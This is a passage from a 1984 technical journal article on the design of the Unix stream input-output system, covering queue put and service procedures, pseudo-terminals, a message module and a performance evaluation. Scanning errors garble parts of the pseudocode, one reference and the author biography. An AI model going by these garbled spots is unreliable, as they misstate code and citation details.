routine and its accompanying service procedure: putproc ( q , bp ) struct queue *q; struct block *bp put bp on q echo characters in bp ' s data if (bp* s data contains new-line or carriage return) enable q service ( q ) struct queue *q take data f rom q until new-line or carriage return , processing erase and kill characters call q— mext- »putp to hand line to upstream queue call q— >next— >putp with DELIM message The put procedure generates the echo characters as promptly as possible; when the terminal module is attached to a device handler, 318 TECHNICAL JOURNAL, OCTOBER 1984 they are created during the input interrupt from the device, because the put procedure is called as a subroutine of the handler. On the other hand, line-gathering and erase and kill processing, which can be lengthy, are done during the service procedure at lower priority. VI. CONNECTION WITH THE REST OF THE SYSTEM Although all the drivers for terminal and network devices, and all protocol handlers, were rewritten, only minor changes were required elsewhere in the system. Character devices and a character device switch, as described by Thompson, 4 are still present. A pointer in the character device switch structure, if null, causes the system to treat the device as always; this is used for raw disk and tape, for example. If not null, it points to initialization information for the stream device; when a stream device is opened, the queue structure shown in Fig. 1 is created, using this information, and a pointer to the structure naming the stream is saved (in the “inode table” 4 ). Subsequently, when the user process makes read, write, ioctl, or close calls, presence of a non-null stream pointer directs the system to use a set of stream routines to generate and receive queue messages; these are the “top-level routines” referred to previously. Only a few changes in user-level code are necessary, most because opening a terminal puts it in the “very raw” mode shown in Fig. 1. In order to install the terminal-processing handler, it is necessary for programs such as ini t to execute the appropriate ioctl call. VII. INTERPROCESS COMMUNICATION As previously described, the stream I/O system constitutes a flexible communication path between user processes and devices. With a small addition, it also provides a mechanism for interprocess communica- tion. A special device, the “pseudo-terminal” or PT, connects proc- esses. PT files come in even-odd pairs; data written on the odd member of the pair appears as input for the even member, and vice versa. The idea is not new; it appears in Tenex 5 and its successors, for example. It is analogous to pipes, and especially to named pipes. 6 PT files differ from traditional pipes in two ways: they are full-duplex, and control information passes through them as well as data. They differ from the usual pseudo-terminal files 2 by not having any of the usual terminal processing mechanisms inherently attached to them; they are pure transmitters of control and data messages. PT files are adequate for setting up a reasonably general mechanism for explicit process com- munication, but by themselves are not especially interesting. A special message module provides more intriguing possibilities. In one direction, the message processor takes control and data messages, such as those discussed above, and transforms them into data blocks STREAM INPUT-OUTPUT SYSTEM 319 ' MESSAGE DEVICE PROCESS MESSAGE - PT USER PROCESS TTY IN PT * Fig. 4 — Configuration for device simulator. starting with a header giving the message type, and followed by the message content. In the other direction, it parses similarly structured data messages and creates the corresponding control blocks. Figure 4 shows a configuration in which a user process communicates through the terminal module, a PT file pair, and the message module with another user-level process that simulates a device driver. Because PT files are transparent, and the message module maps bijectively between device-process data and stream control messages, the device simulator may be completely faithful up to details of timing. In particular, user’s ioctl requests are sent to the device process and are handled by it, even if they are not understood by the operating system. The usefulness of this setup is not so much to simulate new devices, but to provide ways for one program to control the environment of another. Pike 7 shows how these mechanisms are used to create mul- tiple virtual terminals on one physical terminal. In another applica- tion, intermachine connections in which a user on one computer logs into another make use of the message module. Here the ioctl requests generated by programs on the remote machine are translated by this module into data messages that can be sent over the network. The local callout program translates them back into terminal control commands. VIII. EVALUATION My intent in rewriting the character I/O system was to improve its structure by separating functions that had been intertwined, and by allowing independent modules to be connected dynamically across well-defined interfaces. I also wanted to make the system faster and smaller. The most difficult part of the project was the design of the interface. It was guided by these decisions: 1. It seemed to be necessary for efficiency that the objects passed between modules be references to blocks of data. The most important 320 TECHNICAL JOURNAL, OCTOBER 1984 consequences of this principle, and those that proved deciding, are that data need not be copied as it passes across a module interface, and that many characters can be handled during a single intermodule transmission. Another effect, undesirable but accepted, is that each module must be prepared to handle discrete chunks of data of unpre- dictable size. For example, a protocol that expects records containing (say) an 8-byte header must be prepared to paste together smaller data blocks and split a block containing both a header and following data. A related, although not necessarily consequent, decision was to make the code assume that the data is addressable. 2. I decided, with regret, that each processing module could not act as an independent process with its own call record. The numbers seemed against it: on large systems it is necessary to allow for as many as 1000 queues, and I saw no good way to run this many processes without consuming inordinate amounts of storage. As a result, stream server procedures are not allowed to block awaiting data, but instead must return after saving necessary status information explicitly. The contortions required in the code are seldom serious in practice, but the beauty of the scheme would increase if servers could be written as a simple read-write loop in the true coroutine style. 3. The characteristic feature of the design — the server and put procedures — was the most difficult to work out. I began with a belief that the intermodule interface should be identical in the read and write directions. Next, I observed that a pure call model (put procedure only) would not work; queueing would be necessary at some point. For example, if the write system entry called through the terminal proc- essing module to the device driver, the driver would need to queue characters internally lest output be completely synchronous. On the other hand, a pure queueing model (service procedure only; upstream modules always place their data in an input queue) also appeared impractical. As discussed above, a module (for example terminal input) must often be activated at times that depend on its input data. After considerable churning of details, the model presented here emerged. In general its performance by various measures lives up to hopes. The improvement in modularity is hard to measure, but seems real; for example, the number of included header files in stream modules drops to about one half of those required by similar routines in the base system (4.1 BSD). Certainly stream modules may be composed more freely than were the “line disciplines” of older systems. The program text size of the version of the operating system de- scribed here is about 106 kilobytes on the VAX*; the base system was about 130 kilobytes. The reduction was achieved by rewriting the * Trademark of Digital Equipment Corporation. STREAM INPUT-OUTPUT SYSTEM 321 various device drivers and protocols and eliminating the Seventh Edition multiplexed files, 1 most (though not all) of whose functions are subsumed by other mechanisms. On the other hand, the data space has increased. On a VAX- 11/750* configured for 32 users about 32 kilobytes are used for storage of the structures for streams, queues, and blocks. The traditional character lists seem to require less; similar systems from Berkeley and AT&T use between 14 and 19 kilobytes. The tradeoff of program for data seems desirable. Proper time comparisons have not been made, because of the diffi- culty of finding a comparable configuration. On a VAX-11/750, print- ing a large file on a directly connected terminal consumes 346 micro- seconds per character using the system described here; this is about 10 percent slower than the base system. On the other hand, that system's per-character interrupt routine is coded in assembly language, and the rest of its terminal handler is replete with nonportable interpolated assembly code; the current system is written completely in C. Printing the same file on a terminal connected through a primitive network interface requires 136 microseconds per character, half as much as the older network routines. Pike 7 observes that among the three implementations of Blit connection software, the one based on the stream system is the only one that can down load programs at anything approaching line speed through a 19.2 kb/s connection. In general I conclude that the new organization never slows comparable tasks much, and that considerable speed improvements are sometimes possible. Although the new organization performs well, it has several pecu- liarities and limitations. Some of them seem inherent, some are fixable, and some are the subject of current work. I/O control calls turn into messages that require answers before a result can be returned to the user. Sometimes the message ultimately goes to another user-level process that may reply tardily or never. The stream is write-locked until the reply returns, in order to eliminate the need to determine which process gets which reply. A timeout breaks the lock, so there is an unjustified error return if a reply is late, and a long lockup period if one is lost. The problem can be ameliorated by working harder on it, but it typifies the difficulties that turn up when direct calls are replaced by message-passing schemes. Several oddities appear because time spent in server routines cannot be assigned to any particular user or process. It is impossible, for example, for devices to support privileged ioctl calls, because the device has no idea who generated the message. Accounting and sched- uling become less accurate; a short census of several systems showed that between 4 and 8 percent of non-idle CPU time was being spent in server routines. Finally, the anonymity of server processing most 322 TECHNICAL JOURNAL, OCTOBER 1984 certainly makes it more difficult to measure the performance of the new I/O system. In its current form the stream I/O system is purely data-driven. That is, data is presented by a user’s write call, and passes through to the device; conversely, data appears unbidden from a device and passes to the top level, where it is picked up by read calls. Wherever possible flow control throttles down fast generators of data, but nowhere except at the consumer end of a stream is there knowledge of precisely how much data is desired. Consider a command to execute a possibly interactive program on another machine connected by a stream. The simplest such command sets up the connection and invokes the remote program, and then copies characters from its own standard input to the stream, and from the stream to its standard output. The scheme is adequate in practice, but breaks when the user types more than the remote program expects. For example, if the remote program reads no input at all, any typed-ahead characters are sent to the remote system and lost. This demonstrates a problem, but I know of no solution inside the stream I/O mechanism itself; other ideas will have to be applied. Streams are linear connections; by themselves, they support no notion of multiplexing, fan-in or fan-out. Except at the ends of a stream, each invocation of a module has a unique “next” and “pre- vious” module. Two locally important applications of streams testify to the importance of multiplexing: Blit terminal connections , 7 where the multiplexing is done well, though at some performance cost, by a user program, and remote execution of commands over a network, where it is desired, but not now easy, to separate the standard output from error output. It seems likely that a general multiplexing mecha- nism could help in both cases, but again, I do not yet know how to design it. Although the current design provides elegant means for controlling the semantics of communication channels already opened, it lacks general ways of establishing channels between processes. The PT files described above are just fine for Blit layers, and work adequately for handling a few administrator-controlled client-server relationships. (Yes, we have multimachine mazewar.) Nevertheless, better naming mechanisms are called for. In spite of these limitations, the stream I/O system works well. Its aim was to improve design rather than to add features, in the belief that with proper design, the features come cheaply. This approach is arduous, but continues to succeed. REFERENCES 1. Unix Programmer’s Manual , Seventh Edition, Bell Laboratories, Murray Hill, NJ (January 1979). STREAM INPUT-OUTPUT SYSTEM 323 2. Unix Progr&mmeris Manual, Virtual VAX-11 Version, University of California, Bietk&hy (Jn&e IMA.). 3. A. G. Fraser, “Datakit — A Modular Network for Synchronous and Asynchronous Traffic,” Proc. Int.Qonf. on Commun., Boston, MA (June 1979). 4. K. Thompson, “Unix Time-Sharing Sytem: Unix Implementation,” B.S.T.J. 57, No. 6 (July-August 1978), pp. 26-41; 5. D. G. Bobrow, J. D. Burchfiel, D. L. Murphy, and R. S. Tomlinson, “TENEX, a Paged Time Sharing System for the PDP-10,” Comm. Assoc. Comp. Mach. 15, No. 3 (March 1972), pp. 135-143. 6. T. A. Dolotta, S. B. Olsson, and A. G. Petrucelli, Unix User's Manual, Release 3.0, Bell Laboratories, Murray Hill, NJ (June 1980). 7. R. Pike, “The Blit: A Multiplexed Graphics Terminal,” AT&T Bell Lab. Tech. J., this issue. AUTHOR Dennis M. Ritchie, B.A. (Physics), 1963, Ph.D. (Applied Mathematics), 1968, Harvard University; AT&T Bell Laboratories, 1978 — . The subject of Mr. Ritchie’s doctoral thesis was subrecursive hierarchies of functions. Since joining AT&T Bell Laboratories, he has worked on the design of computer languages and operating systems. After contributing to the Multics project, he joined K. Thompson in the creation of the UNIX operating system, and designed and implemented the C language, in which the system is written. In 1982 he shared the IEEE Emmanuel Piore award with Thompson, and in 1983 he and Thompson won the ACM Turning award. His current research is concerned with the structure of operating systems. 324 TECHNICAL JOURNAL, OCTOBER 1984